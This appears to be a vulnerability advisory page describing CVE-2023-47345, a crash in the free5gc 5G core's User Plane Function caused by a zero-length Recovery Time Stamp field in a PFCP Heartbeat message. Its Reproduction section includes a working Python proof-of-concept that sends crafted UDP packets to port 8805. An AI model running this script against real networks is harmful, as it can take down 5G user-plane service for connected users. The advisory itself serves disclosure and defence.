VYPR
← All advisories
High severityNVD Advisory· Published Nov 15, 2023· Updated Aug 29, 2024

CVE-2023-47345

CVE-2023-47345

Description

Buffer overflow in free5gc 3.3.0 allows denial of service via a crafted PFCP Heartbeat message with a zero-length Recovery Time Stamp IE.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Buffer overflow in free5gc 3.3.0 allows denial of service via a crafted PFCP Heartbeat message with a zero-length Recovery Time Stamp IE.

Vulnerability

CVE-2023-47345 describes a buffer overflow vulnerability in the free5gc User Plane Function (UPF) component, version 3.3.0. The bug is triggered by a crafted PFCP Heartbeat request where the Recovery Time Stamp Information Element (IE) has its length field set to zero. This causes the UPF to mishandle the message, leading to a memory access violation [1][2].

Exploitation

An attacker can exploit this vulnerability by sending a malicious UDP packet to the UPF's PFCP port (usually 8805) from a network-accessible position. No authentication is required; the attacker only needs to be able to send PFCP messages to the target UPF. The proof-of-concept script sends a malformed Heartbeat request after establishing an association, causing the UPF to crash [1].

Impact

Successful exploitation results in a denial of service (DoS), crashing the UPF and disrupting 5G core network functionality. Since the UPF is a critical component for user data handling, its downtime can affect service availability for all users connected through that UPF [1][2].

Mitigation

As of the advisory, free5gc version 3.3.0 is vulnerable; no official patch has been released. Users are advised to monitor the free5gc repository for updates or apply defensive measures such as filtering PFCP messages at the network edge to block malformed packets. The issue was reported on the free5gc GitHub issue tracker [1].

References
  1. [Bugs] UPF crash caused by malformed PFCP messages whose 1st IE length is mutated to zero
  2. NVD - CVE-2023-47345

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
github.com/free5gc/free5gcGo
<= 3.3.0

Affected products

2

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing length validation in PFCP IE parsing allows a zero-length Recovery Time Stamp IE to trigger a slice bounds out-of-range panic."

Attack vector

An attacker sends a crafted PFCP Heartbeat Request message over UDP to the UPF's PFCP port (8805). The message contains a Recovery Time Stamp Information Element whose length field is set to zero [ref_id=1]. When the UPF parses this malformed IE, the `ParseMultiIEs` function attempts to read a slice with an out-of-bounds length, causing a Go runtime panic that crashes the UPF process [ref_id=1]. The attacker must first establish a PFCP association (by sending a valid Association Setup Request) before the Heartbeat Request is processed [ref_id=1].

Affected code

The crash occurs in the `go-pfcp` library used by free5gc's UPF. The stack trace shows the panic originates at `ie.go:637` in `ParseMultiIEs` and `heartbeat-request.go:101` in `UnmarshalBinary`, called from `pfcp.go:125` in the UPF's PFCP server main loop [ref_id=1]. The vulnerable code path is in the parsing of PFCP Heartbeat Request messages where the Recovery Time Stamp IE length is zero.

What the fix does

No patch is provided in the bundle. The advisory recommends checking the IE length of PFCP messages before parsing, and either updating the handling logic or dropping malformed messages to avoid crashes [ref_id=1]. The root cause is that the `go-pfcp` library's `ParseMultiIEs` function does not validate that the declared IE length is within the bounds of the remaining buffer, leading to a slice bounds out-of-range panic when a zero-length IE is encountered [ref_id=1].

Preconditions

  • networkAttacker must be able to send UDP packets to the UPF's PFCP port (8805)
  • inputA valid PFCP association must be established before the malformed Heartbeat Request is processed

Reproduction

Build and run the UPF with default config/upfcfg.yaml. Execute the following Python script against 127.0.0.8:8805 [ref_id=1]:

```python import socket udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udp_socket.settimeout(1.0) pfcp_association_setup_request = b'\x20\x05\x00\x1f\x00\x00\x01\x00\x00\x3c\x00\x05\x00\x0a\x64\xc8\x64\x00\x60\x00\x04\xe8\x1f\xdc\x30\x00\x2b\x00\x06\x21\x00\x00\x00\x00\x00' pfcp_heartbeat_request = b'\x20\x01\x00\x0c\x00\x00\x02\x00\x00\x60\x00\x00\xe8\x1f\xe7\xb4' udp_socket.sendto(pfcp_association_setup_request, ('127.0.0.8', 8805)) try: udp_socket.recv(65535) except Exception as e: print(f"Receive failed: {e}") udp_socket.sendto(pfcp_heartbeat_request, ('127.0.0.8', 8805)) try: udp_socket.recv(65535) except Exception as e: print(f"Receive failed: {e}") udp_socket.close() ```

Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

3

News mentions

0

No linked articles in our index yet.